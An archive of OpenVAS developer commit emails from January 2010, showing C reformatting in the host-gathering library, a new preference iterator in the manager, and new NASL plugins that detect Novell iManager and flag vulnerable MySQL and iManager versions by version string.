*v; int n = 0; int family; @@ -436,60 +463,62 @@ return 0; } - // Skip (leading) spaces - while ((*p == ' ') && (p!='\0')) + // Skip leading spaces + while ((*p == ' ') && (p != '\0')) p++; - v = strchr (p+1, ','); + // Terminate string at ',' or ';' + v = strchr (p + 1, ','); if (v == NULL) - v = strchr(p+1, ';'); + v = strchr (p + 1, ';'); if (v != NULL) v[0] = '\0'; + // Strip trailing spaces len = strlen(p); - while (p[len-1]==' ') + while (p[len-1] == ' ') { - p[len-1]='\0'; + p[len-1] = '\0'; len --; } /* Check whether ip is of type ipv6. Right now we support only ipv6 * addresses without any range or netmask. */ - if (!getaddrfamily(p, &family)) - { - if(family == AF_INET6) - { - inet_pton(AF_INET6, p, &ip6); - hg_add_ipv6host_with_options (globals, p, &ip6, 0, 128, 0, &ip6); - } - else - { - if (hg_add_host (globals, p) < 0) + if (!getaddrfamily (p, &family)) + { + if (family == AF_INET6) { - if ( v != NULL ) + inet_pton (AF_INET6, p, &ip6); + hg_add_ipv6host_with_options (globals, p, &ip6, 0, 128, 0, &ip6); + } + else + { + if (hg_add_host (globals, p) < 0) + { + if (v != NULL) + globals->marker = v + 1; + else + globals->marker = NULL; + return -1; + } + } + } + else + { + if (hg_add_host (globals, p) < 0) + { + if (v != NULL) globals->marker = v + 1; else - globals->marker = NULL; + globals->marker = NULL; return -1; } - } - } - else - { - if (hg_add_host (globals, p) < 0) - { - if ( v != NULL ) - globals->marker = v + 1; - else - globals->marker = NULL; - return -1; } - } n ++; if (v != NULL) - p = v+1; + p = v + 1; else p = NULL; } @@ -498,16 +527,22 @@ return 0; } +/** + * @param ip_max Ignored. + */ void -hg_add_ipv6host_with_options (struct hg_globals * globals, char * hostname, +hg_add_ipv6host_with_options (struct hg_globals * globals, char * hostname, struct in6_addr* ip, int alive, int netmask, int use_max, struct in6_addr* ip_max) { + /** @TODO To be sane, shouldnt c_hostname be initialized to NULL? What is it + * used for anyways? */ char * c_hostname; struct hg_host * host; int i; char local_hostname[1024]; + /** @TODO We will probably segfault sooner or later if inet_ntop fails. */ if (inet_ntop (AF_INET6, ip, local_hostname, sizeof (local_hostname))) c_hostname = strdup (hostname); @@ -531,6 +566,13 @@ host->use_max = use_max ? 1 : 0; } +/** + * @brief Appends a new hg_host to the hg_globals hostlist. + * + * @param[in,out] globals hg_globals to add host to. + * @param[in] hostname hostname. + */ +/** @TODO consider const for hostname parameter */ void hg_add_host_with_options (struct hg_globals * globals, char* hostname, struct in_addr ip, int alive, int netmask, @@ -540,34 +582,39 @@ struct hg_host * host; int i; - c_hostname = strdup(hostname); - for(i=0;ihost_list; - while(host->next)host = host->next; - host->next = malloc(sizeof(struct hg_host)); - bzero(host->next, sizeof(struct hg_host)); + while (host->next) + host = host->next; + host->next = malloc (sizeof (struct hg_host)); + bzero (host->next, sizeof (struct hg_host)); host->hostname = c_hostname; - host->domain = hostname ? hg_name_to_domain(c_hostname):""; + host->domain = hostname ? hg_name_to_domain (c_hostname) : ""; host->cidr_netmask = netmask; - if(netmask != 32)printf("Error ! Bad netmask\n"); + if (netmask != 32) + printf ("Error ! Bad netmask\n"); host->tested = 0; host->alive = alive; host->addr = ip; convipv4toipv4mappedaddr (host->addr, &host->in6addr); - host->use_max = use_max?1:0; - if(ip_max) - { - host->max.s_addr = ip_max->s_addr; - host->min = cidr_get_first_ip(ip, netmask); - if(ntohl(host->max.s_addr) < ntohl(host->min.s_addr)) + host->use_max = use_max ? 1 : 0; + if (ip_max) { - fprintf(stderr, "hg_add_host: error - ip_max < ip_min !\n"); - host->max.s_addr = host->min.s_addr; + host->max.s_addr = ip_max->s_addr; + host->min = cidr_get_first_ip (ip, netmask); + if (ntohl (host->max.s_addr) < ntohl (host->min.s_addr)) + { + fprintf (stderr, "hg_add_host: error - ip_max < ip_min !\n"); + host->max.s_addr = host->min.s_addr; + } + convipv4toipv4mappedaddr (host->max, &host->max6); + convipv4toipv4mappedaddr (host->min, &host->min6); } - convipv4toipv4mappedaddr (host->max, &host->max6); - convipv4toipv4mappedaddr (host->min, &host->min6); - } } void @@ -576,21 +623,26 @@ struct hg_host * list = globals->tested; int len; - while(list && list->next)list = list->next; - list->next = malloc(sizeof(struct hg_host)); - bzero(list->next, sizeof(struct hg_host)); - len = strlen(domain); - list->domain = malloc(len + 1); - strncpy(list->domain, domain, len + 1); + while (list && list->next) + list = list->next; + list->next = malloc (sizeof (struct hg_host)); + bzero (list->next, sizeof (struct hg_host)); + + len = strlen (domain); + list->domain = malloc (len + 1); + strncpy (list->domain, domain, len + 1); } void hg_add_subnet (struct hg_globals * globals, struct in_addr ip, int netmask) { - struct hg_host * list = globals->tested; - while(list && list->next)list = list->next; - list->next = malloc(sizeof(struct hg_host)); - bzero(list->next, sizeof(struct hg_host)); + struct hg_host * list = globals->tested; + + while (list && list->next) + list = list->next; + list->next = malloc (sizeof (struct hg_host)); + bzero (list->next, sizeof (struct hg_host)); + list->addr = ip; list->cidr_netmask = netmask; } Modified: trunk/openvas-libraries/hg/hg_dns_axfr.c =================================================================== --- trunk/openvas-libraries/hg/hg_dns_axfr.c 2010-01-11 07:09:26 UTC (rev 6357) +++ trunk/openvas-libraries/hg/hg_dns_axfr.c 2010-01-11 08:32:36 UTC (rev 6358) @@ -53,8 +53,7 @@ /* The HG_GET16 macro and the hg_get16 function were copied from glibc 2.7 * (include/arpa/nameser.h (NS_GET16) and resolv/ns_netint.c (ns_get16)) to - * avoid using private glibc functions. - */ + * avoid using private glibc functions. */ # define HG_GET16(s, cp) \ do { \ @@ -78,10 +77,7 @@ } static u_char * -hg_dns_axfr_expand_name(cp, msg, name, namelen) - u_char *cp, *msg; - char *name; - int namelen; +hg_dns_axfr_expand_name (u_char* cp, u_char* msg, char* name, int namelen) { int n; @@ -95,11 +91,9 @@ } static char * -hg_dns_axfr_add_host(globals, cp, msg) - struct hg_globals * globals; - u_char *cp, *msg; +hg_dns_axfr_add_host (struct hg_globals * globals, u_char* cp, u_char* msg) { - int type; + int type; char name[MAXDNAME]; if ((cp = (u_char *)hg_dns_axfr_expand_name(cp, msg, name, sizeof(name))) == NULL) @@ -117,54 +111,47 @@ } -/* - * Asks to the nameserver the names of the - * name servers that are taking care of - * the domain we are interested in. Returns the - * length of the answer +/** + * @brief Asks to the nameserver the names of the name servers that are taking + * @brief care of the domain we are interested in. + * + * @return The length of the answer. */ static int - hg_dns_get_nameservers(globals, domain, answer) - struct hg_globals * globals; - char * domain; - querybuf * answer; +hg_dns_get_nameservers (struct hg_globals * globals, char* domain, + querybuf* answer) { int msglen; querybuf buffer; - + msglen = res_mkquery(QUERY, domain, C_IN, T_NS, NULL, 0, NULL, buffer.qb2, - sizeof(buffer)); + sizeof(buffer)); if(msglen < 0) return(-1); msglen = res_send(buffer.qb2, msglen, answer->qb2, sizeof(*answer)); if(msglen < 0) return(-1); return(msglen); } -/* - * Decodes the nameserver reply and put - * the list of nameservers into a struct +/** + * @brief Decodes the nameserver reply and put the list of nameservers into a + * @brief struct. */ static int - hg_dns_read_ns_from_answer(domainname, answer, ns, msglen) - char * domainname; - querybuf answer; - struct hg_host ** ns; - int msglen; +hg_dns_read_ns_from_answer (char * domainname, querybuf answer, + struct hg_host ** ns, int msglen) { struct hg_host * host; int count; u_char * cp; - + count = ntohs(answer.qb1.ancount) + ntohs(answer.qb1.nscount) + - ntohs(answer.qb1.arcount); + ntohs(answer.qb1.arcount); if(!count||answer.qb1.rcode != NOERROR)return(-1); cp = (u_char *)answer.qb2 + 12; if(ntohs(answer.qb1.qdcount) > 0) cp += dn_skipname(cp, answer.qb2 + msglen) + QFIXEDSZ; - - /* - * Now adding the nameservers into our host list - */ + + /* Now adding the nameservers into our host list. */ host = malloc(sizeof(struct hg_host)); bzero(host, sizeof(struct hg_host)); while(count) @@ -190,8 +177,8 @@ { if(host && host->hostname && !strcasecmp(host->hostname, name))ok = 0; t = t->next; - } - + } + if(ok) { int len; @@ -224,19 +211,16 @@ *ns = host; return(0); } - -/* - * Checks that we have the IP addresses - * of all the NS in our list - * + +/** + * @brief Checks that we have the IP addresses of all the NS in our list. */ static void - hg_dns_fill_ns_addrs(ns) - struct hg_host * ns; +hg_dns_fill_ns_addrs (struct hg_host * ns) { struct hg_host * t = ns; struct in6_addr in6addr; - + while(t && t->next) { hg_resolv(t->hostname, &in6addr, AF_INET); @@ -247,10 +231,7 @@ static int - hg_dns_axfr_decode(globals, answer, limit) - struct hg_globals * globals; - querybuf *answer; - u_char * limit; +hg_dns_axfr_decode (struct hg_globals * globals, querybuf *answer, u_char * limit) { HEADER * hp = (HEADER *)answer; u_char * cp; @@ -260,22 +241,18 @@ ancount = ntohs(hp->ancount); nscount = ntohs(hp->nscount); arcount = ntohs(hp->arcount); - + if(!(qdcount + ancount + nscount + arcount))return(-1); cp = (u_char *)answer + HFIXEDSZ; while(qdcount--)cp += dn_skipname(cp, limit) + QFIXEDSZ; hg_dns_axfr_add_host(globals, cp, answer); - + return(0); } - + static int - hg_dns_axfr_query(globals, domain, ns, answer, limit) -struct hg_globals * globals; -char * domain; -struct hg_host * ns; -querybuf * answer; -u_char ** limit; +hg_dns_axfr_query (struct hg_globals * globals, char * domain, + struct hg_host * ns, querybuf * answer, u_char ** limit) { int soc; int msglen; @@ -291,7 +268,7 @@ msglen = res_mkquery(QUERY, domain, C_IN, T_AXFR, NULL, 0, NULL, query.qb2, sizeof(query)); - + if(msglen < 0)return(-1); bzero(&addr, sizeof(struct sockaddr_in)); addr.sin_family = AF_INET; @@ -310,12 +287,12 @@ close(soc); return(-1); } - + while(!finished) { fd_set rd; struct timeval tv = {0, 5}; - + cp = (u_char *)answer; FD_ZERO(&rd); FD_SET(soc, &rd); @@ -338,7 +315,7 @@ { int num_read; int left; - + left = len; while(left > 0) { @@ -377,13 +354,11 @@ -/* +/** * Our "main" function regarding DNS AXFR - */ + */ void - hg_dns_axfr_add_hosts(globals, domain) - struct hg_globals * globals; - char * domain; +hg_dns_axfr_add_hosts (struct hg_globals * globals, char * domain) { int msglen; querybuf answer; @@ -397,7 +372,7 @@ if(msglen < 0)return; if(hg_dns_read_ns_from_answer(domain, answer, &ns, msglen)<0)return; hg_dns_fill_ns_addrs(ns); - + bzero(&answer, sizeof(answer)); #ifdef DEBUG_HIGH hg_dump_hosts(ns); Modified: trunk/openvas-libraries/hg/hg_subnet.c =================================================================== --- trunk/openvas-libraries/hg/hg_subnet.c 2010-01-11 07:09:26 UTC (rev 6357) +++ trunk/openvas-libraries/hg/hg_subnet.c 2010-01-11 08:32:36 UTC (rev 6358) @@ -30,11 +30,8 @@ void hg_gather_subnet_hosts(struct hg_globals *, struct hg_host *); - -void -hg_gather_subnet_hosts(globals, host) - struct hg_globals * globals; - struct hg_host * host; +void +hg_gather_subnet_hosts (struct hg_globals * globals, struct hg_host * host) { struct in_addr start; struct in_addr end; @@ -46,19 +43,17 @@ end = cidr_get_last_ip (start, host->cidr_netmask); hg_get_name_from_ip(&in6addr, hostname, sizeof(hostname)); start.s_addr = in6addr.s6_addr32[3]; /* This works only for ipv4 as of now */ - hg_add_host_with_options(globals, strdup(hostname), + hg_add_host_with_options(globals, strdup(hostname), start, 1, 32, 1, - &end); + &end); } -struct in_addr -cidr_get_first_ip(addr, netmask) - struct in_addr addr; - int netmask; +struct in_addr +cidr_get_first_ip (struct in_addr addr, int netmask) { -#if DANGEROUS - +#if DANGEROUS + struct in_addr ret; /* * Netmask is the integer that the @@ -79,26 +74,22 @@ #endif } -struct in_addr -cidr_get_last_ip(start, netmask) - struct in_addr start; - int netmask; +struct in_addr +cidr_get_last_ip (struct in_addr start, int netmask) { struct in_addr ret; - /* - * The last IP is the first IP plus - * 2 ^ (32 - netmask ) - 1 - */ + /* The last IP is the first IP plus + * 2 ^ (32 - netmask ) - 1 */ ret.s_addr = ntohl(start.s_addr); ret.s_addr >>= (32 - netmask); ret.s_addr++; ret.s_addr <<= (32 - netmask); - + if(netmask != 31) ret.s_addr-=2; /* skip the broadcast */ else ret.s_addr-=1; /* skip the broadcast */ - + ret.s_addr = htonl(ret.s_addr); return(ret); } From scm-commit at wald.intevation.org Mon Jan 11 09:36:05 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 11 Jan 2010 09:36:05 +0100 (CET) Subject: [Openvas-commits] r6359 - in trunk/openvas-libraries: . hg Message-ID: <20100111083605.A71EB861F2CC@pyrosoma.intevation.org> Author: felix Date: 2010-01-11 09:36:05 +0100 (Mon, 11 Jan 2010) New Revision: 6359 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/hg/hg_add_hosts.c trunk/openvas-libraries/hg/hg_add_hosts.h Log: * hg/hg_add_hosts.c (hg_add_host), hg/hg_add_hosts.h (hg_add_host): Declared function hg_add_host static and removed from interface. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2010-01-11 08:32:36 UTC (rev 6358) +++ trunk/openvas-libraries/ChangeLog 2010-01-11 08:36:05 UTC (rev 6359) @@ -1,7 +1,12 @@ 2010-01-11 Felix Wolfsteller + * hg/hg_add_hosts.c (hg_add_host), hg/hg_add_hosts.h (hg_add_host): + Declared function hg_add_host static and removed from interface. + +2010-01-11 Felix Wolfsteller + * hg/hg_add_hosts.c, hg/hg_dns_axfr.c, hg/hg_subnet.c: Reformatting, - * doc and todos added. + doc and todos added. 2010-01-08 Felix Wolfsteller Modified: trunk/openvas-libraries/hg/hg_add_hosts.c =================================================================== --- trunk/openvas-libraries/hg/hg_add_hosts.c 2010-01-11 08:32:36 UTC (rev 6358) +++ trunk/openvas-libraries/hg/hg_add_hosts.c 2010-01-11 08:36:05 UTC (rev 6359) @@ -178,7 +178,7 @@ * * @TODO verify @return 0 if successfull, -1 otherwise? */ -int +static int hg_add_host (struct hg_globals * globals, char* hostname) { int cidr_netmask = 32; Modified: trunk/openvas-libraries/hg/hg_add_hosts.h =================================================================== --- trunk/openvas-libraries/hg/hg_add_hosts.h 2010-01-11 08:32:36 UTC (rev 6358) +++ trunk/openvas-libraries/hg/hg_add_hosts.h 2010-01-11 08:36:05 UTC (rev 6359) @@ -19,7 +19,6 @@ #ifndef HG_ADD_HOSTS_H__ #define HG_ADD_HOSTS_H__ -int hg_add_host (struct hg_globals *, char *); int hg_add_comma_delimited_hosts (struct hg_globals *, int); void hg_add_host_with_options (struct hg_globals *, char *, struct in_addr, int, int,int, struct in_addr *); From scm-commit at wald.intevation.org Mon Jan 11 11:18:54 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 11 Jan 2010 11:18:54 +0100 (CET) Subject: [Openvas-commits] r6360 - in trunk/openvas-plugins: . scripts Message-ID: <20100111101854.E9D3886607CD@pyrosoma.intevation.org> Author: mime Date: 2010-01-11 11:18:50 +0100 (Mon, 11 Jan 2010) New Revision: 6360 Added: trunk/openvas-plugins/scripts/mysql_37640.nasl trunk/openvas-plugins/scripts/novell_imanager_37672.nasl trunk/openvas-plugins/scripts/novell_imanager_detect.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2010-01-11 08:36:05 UTC (rev 6359) +++ trunk/openvas-plugins/ChangeLog 2010-01-11 10:18:50 UTC (rev 6360) @@ -1,3 +1,10 @@ +2010-01-11 Michael Meyer + + * scripts/novell_imanager_detect.nasl, + scripts/mysql_37640.nasl, + scripts/novell_imanager_37672.nasl: + Added new plugins. + 2009-01-09 Chandrashekhar B * scripts/gb_kaspersky_prdts_priv_escalation_vuln_jan10.nasl, Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2010-01-11 08:36:05 UTC (rev 6359) +++ trunk/openvas-plugins/cve_current.txt 2010-01-11 10:18:50 UTC (rev 6360) @@ -477,3 +477,5 @@ CVE-2009-4529 SecPod svn R CVE-2009-4530 SecPod svn R CVE-2009-4535 SecPod svn R +CVE-2009-4486 Greenbone svn R +37640 Greenbone svn R Added: trunk/openvas-plugins/scripts/mysql_37640.nasl =================================================================== --- trunk/openvas-plugins/scripts/mysql_37640.nasl 2010-01-11 08:36:05 UTC (rev 6359) +++ trunk/openvas-plugins/scripts/mysql_37640.nasl 2010-01-11 10:18:50 UTC (rev 6360) @@ -0,0 +1,81 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# MySQL 5.0.51a Unspecified Remote Code Execution Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100436); + script_bugtraq_id(37640); + script_version ("1.0-$Revision$"); + + script_name("MySQL 5.0.51a Unspecified Remote Code Execution Vulnerability"); + +desc = "Overview: +MySQL 5.0.51a is prone to an unspecified remote code-execution +vulnerability. + +Very few technical details are currently available. + +An attacker can leverage this issue to execute arbitrary code within +the context of the vulnerable application. Failed exploit attempts +will result in a denial-of-service condition. + +This issue affects MySQL 5.0.51a; other versions may also be +vulnerable. + +References: +http://www.securityfocus.com/bid/37640 +http://archives.neohapsis.com/archives/dailydave/2010-q1/0002.html +http://www.mysql.com/ +http://intevydis.com/mysql_demo.html + +Risk factor : High"; + + script_description(desc); + script_summary("Determine if MySQL version is 5.0.51a"); + script_category(ACT_GATHER_INFO); + script_family("Databases"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencie("mysql_version.nasl"); + script_require_ports("Services/mysql", 3306); + exit(0); +} + +include("version_func.inc"); +include("misc_func.inc"); + +port = get_kb_item("Services/mysql"); +if(!port)exit(0); +if(!get_tcp_port_state(port))exit(0); + +if(!ver = get_mysql_version(port:port))exit(0); +if(isnull(ver))exit(0); + +if(ver =~ "5.0.51a") { + security_hole(port:port); + exit(0); +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/mysql_37640.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/novell_imanager_37672.nasl =================================================================== --- trunk/openvas-plugins/scripts/novell_imanager_37672.nasl 2010-01-11 08:36:05 UTC (rev 6359) +++ trunk/openvas-plugins/scripts/novell_imanager_37672.nasl 2010-01-11 10:18:50 UTC (rev 6360) @@ -0,0 +1,87 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Novell iManager Importing/Exporting Schema Stack Buffer Overflow Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100435); + script_bugtraq_id(37672); + script_cve_id("CVE-2009-4486"); + script_version ("1.0-$Revision$"); + + script_name("Novell iManager Importing/Exporting Schema Stack Buffer Overflow Vulnerability"); + +desc = "Overview: +Novell iManager is prone to a stack-based buffer-overflow +vulnerability because it fails to perform adequate boundary checks on +user-supplied data. + +Attackers may exploit this issue to execute arbitrary code in the +context of the affected application. Failed exploit attempts will +likely cause denial-of-service conditions. + +Novell iManager 2.7.2 and prior are vulnerable. + +Solution: +The vendor has released an advisory and fixes. Please see the +references for details. + +References: +http://www.securityfocus.com/bid/37672 +http://www.novell.com/products/consoles/imanager/features.html +http://www.zerodayinitiative.com/advisories/ZDI-10-001/ +http://www.novell.com/support/viewContent.do?externalId=7004985&sliceId=1 + +Risk factor : High"; + + script_description(desc); + script_summary("Determine if Novell iManager version is < 2.7.2"); + script_category(ACT_GATHER_INFO); + script_family("Web application abuses"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("novell_imanager_detect.nasl"); + script_require_ports("Services/www", 8080, 8443); + exit(0); +} + +include("http_func.inc"); +include("http_keepalive.inc"); +include("version_func.inc"); + +port = get_http_port(default:8080); +if(!get_port_state(port))exit(0); + +if(!version = get_kb_item(string("www/", port, "/imanager")))exit(0); + +if(!isnull(version) && version >!< "unknown") { + + if(version_is_less(version: vers, test_version: "2.7.2")) { + security_hole(port:port); + exit(0); + } + +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/novell_imanager_37672.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/novell_imanager_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/novell_imanager_detect.nasl 2010-01-11 08:36:05 UTC (rev 6359) +++ trunk/openvas-plugins/scripts/novell_imanager_detect.nasl 2010-01-11 10:18:50 UTC (rev 6360) @@ -0,0 +1,105 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Novell iManager Detection +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +# need desc here to modify it later in script. +desc = "Overview: +This host is running Novell iManager, a Web-based administration +console that provides customized access to network administration +utilities and content from virtually any location. + +See also: +http://www.novell.com/products/consoles/imanager/overview.html + +Risk factor : None"; + +if (description) +{ + script_id(100434); + script_version ("1.0-$Revision$"); + script_name("Novell iManager Detection"); + script_description(desc); + script_summary("Checks for the presence of Novell iManager"); + script_category(ACT_GATHER_INFO); + script_family("Service detection"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("find_service.nes", "http_version.nasl"); + script_require_ports("Services/www", 8080, 8443); + script_exclude_keys("Settings/disable_cgi_scanning"); + exit(0); +} + + +include("http_func.inc"); +include("http_keepalive.inc"); +include("global_settings.inc"); + +port = get_http_port(default:8080); + +if(!get_port_state(port))exit(0); + + url = string("/nps/servlet/webacc?taskId=dev.Empty&merge=fw.About"); + req = http_get(item:url, port:port); + buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE); + if( buf == NULL )exit(0); + + if("iManager" >< buf) + { + + url = string("/nps/version.jsp"); # http://www.novell.com/coolsolutions/tip/18634.html + req = http_get(item:url, port:port); + buf = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE); + + vers = string("unknown"); + ### try to get version + version = eregmatch(string: buf, pattern: "([0-9.]+)",icase:TRUE); + + if ( !isnull(version[1]) ) { + vers=chomp(version[1]); + set_kb_item(name:string("cpe:/a:novell:imanager:",vers), value: TRUE); + } else { + set_kb_item(name:string("cpe:/a:novell:imanager"), value: TRUE); + } + + set_kb_item(name: string("www/", port, "/imanager"), value: string(vers)); + + info = string("None\n\nNovell iManager Version '"); + info += string(vers); + info += string("' was detected on the remote host.\n"); + + desc = ereg_replace( + string:desc, + pattern:"None$", + replace:info + ); + + if(report_verbosity > 0) { + security_note(port:port,data:desc); + } + exit(0); + + } +exit(0); + Property changes on: trunk/openvas-plugins/scripts/novell_imanager_detect.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision From scm-commit at wald.intevation.org Mon Jan 11 13:47:41 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 11 Jan 2010 13:47:41 +0100 (CET) Subject: [Openvas-commits] r6361 - in trunk/openvas-manager: . src Message-ID: <20100111124741.2015B86607B7@pyrosoma.intevation.org> Author: mattm Date: 2010-01-11 13:47:40 +0100 (Mon, 11 Jan 2010) New Revision: 6361 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/manage.c trunk/openvas-manager/src/tasks_sql.h Log: Send all preferences when starting a task, even those which have the same value on the server, to match the client behaviour. * src/tasks_sql.h (init_otp_pref_iterator, otp_pref_iterator_name) (otp_pref_iterator_value): New functions. * src/manage.c (send_config_preferences): Iterate with otp_pref_iterator functions. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2010-01-11 10:18:50 UTC (rev 6360) +++ trunk/openvas-manager/ChangeLog 2010-01-11 12:47:40 UTC (rev 6361) @@ -1,3 +1,14 @@ +2010-01-11 Matthew Mundell + + Send all preferences when starting a task, even those which have the + same value on the server, to match the client behaviour. + + * src/tasks_sql.h (init_otp_pref_iterator, otp_pref_iterator_name) + (otp_pref_iterator_value): New functions. + + * src/manage.c (send_config_preferences): Iterate with otp_pref_iterator + functions. + 2010-01-08 Matthew Mundell * src/manage.c (manage_system_report): If the graph is empty, try get Modified: trunk/openvas-manager/src/manage.c =================================================================== --- trunk/openvas-manager/src/manage.c 2010-01-11 10:18:50 UTC (rev 6360) +++ trunk/openvas-manager/src/manage.c 2010-01-11 12:47:40 UTC (rev 6361) @@ -704,10 +704,10 @@ { iterator_t prefs; - init_preference_iterator (&prefs, config, section_name); + init_otp_pref_iterator (&prefs, config, section_name); while (next (&prefs)) { - const char *pref_name = preference_iterator_name (&prefs); + const char *pref_name = otp_pref_iterator_name (&prefs); char *value; if (send_to_server (pref_name)) @@ -723,7 +723,7 @@ } value = preference_value (pref_name, - preference_iterator_value (&prefs)); + otp_pref_iterator_value (&prefs)); if (send_to_server (value)) { g_free (value); Modified: trunk/openvas-manager/src/tasks_sql.h =================================================================== --- trunk/openvas-manager/src/tasks_sql.h 2010-01-11 10:18:50 UTC (rev 6360) +++ trunk/openvas-manager/src/tasks_sql.h 2010-01-11 12:47:40 UTC (rev 6361) @@ -53,6 +53,15 @@ preference_iterator_value (iterator_t*); static void +init_otp_pref_iterator (iterator_t*, const char*, const char*); + +static const char* +otp_pref_iterator_name (iterator_t*); + +static const char* +otp_pref_iterator_value (iterator_t*); + +static void nvt_selector_add (const char*, const char*, const char*, int); static int @@ -4500,7 +4509,6 @@ return levels_sql; } - /** * @brief Initialise a result iterator. * @@ -7130,6 +7138,58 @@ static DEF_ACCESS (preference_iterator_value, 1); /** + * @brief Initialise an "OTP" preference iterator. + * + * This version includes scanner preferences where when the NVT preferences + * is missing. + * + * @param[in] iterator Iterator. + * @param[in] config Config containing preferences. + * @param[in] section Preference section, NULL for general preferences. + */ +static void +init_otp_pref_iterator (iterator_t* iterator, + const char* config, + const char* section) +{ + gchar *quoted_config, *quoted_section; + + assert (config); + assert (section); + assert ((strcmp (section, "PLUGIN_PREFS") == 0) + || (strcmp (section, "SERVER_PREFS") == 0)); + + quoted_config = sql_quote (config); + quoted_section = sql_quote (section); + + init_iterator (iterator, + "SELECT config_preferences.name, config_preferences.value" + " FROM config_preferences, nvt_preferences" + " WHERE config_preferences.config =" + " (SELECT ROWID FROM configs WHERE name = '%s')" + " AND config_preferences.type = '%s'" + " AND config_preferences.name = nvt_preferences.name" + " UNION" + " SELECT nvt_preferences.name, nvt_preferences.value" + " FROM nvt_preferences" + " WHERE nvt_preferences.name %s" + " AND (SELECT COUNT(*) FROM config_preferences" + " WHERE config =" + " (SELECT ROWID FROM configs WHERE name = '%s')" + " AND config_preferences.name = nvt_preferences.name) = 0;", + quoted_config, + quoted_section, + strcmp (quoted_section, "SERVER_PREFS") == 0 + ? "NOT LIKE '%[%]%'" : "LIKE '%[%]%'", + quoted_config); + g_free (quoted_section); + g_free (quoted_config); +} + +static DEF_ACCESS (otp_pref_iterator_name, 0); +static DEF_ACCESS (otp_pref_iterator_value, 1); + +/** * @brief Initialise a config preference iterator. * * @param[in] iterator Iterator. From scm-commit at wald.intevation.org Mon Jan 11 14:01:08 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 11 Jan 2010 14:01:08 +0100 (CET) Subject: [Openvas-commits] r6362 - in trunk/openvas-manager: . src Message-ID: <20100111130108.4F24186607C7@pyrosoma.intevation.org> Author: mattm Date: 2010-01-11 14:01:07 +0100 (Mon, 11 Jan 2010) New Revision: 6362 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/manage.h trunk/openvas-manager/src/omp.c trunk/openvas-manager/src/tasks_sql.h Log: * src/tasks_sql.h (init_manage): Add NVT names to cache. (result_iterator_nvt): Remove, rename with _oid. (result_iterator_nvt_oid, result_iterator_nvt_name): New functions. * src/manage.h: Update headers accordingly. * src/omp.c: Update result_iterator_nvt callers. (print_report_xml): Add name to NVT element. (omp_xml_handle_end_element): In CLIENT_GET_REPORT XML report, add name to NVT element. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2010-01-11 12:47:40 UTC (rev 6361) +++ trunk/openvas-manager/ChangeLog 2010-01-11 13:01:07 UTC (rev 6362) @@ -1,5 +1,18 @@ 2010-01-11 Matthew Mundell + * src/tasks_sql.h (init_manage): Add NVT names to cache. + (result_iterator_nvt): Remove, rename with _oid. + 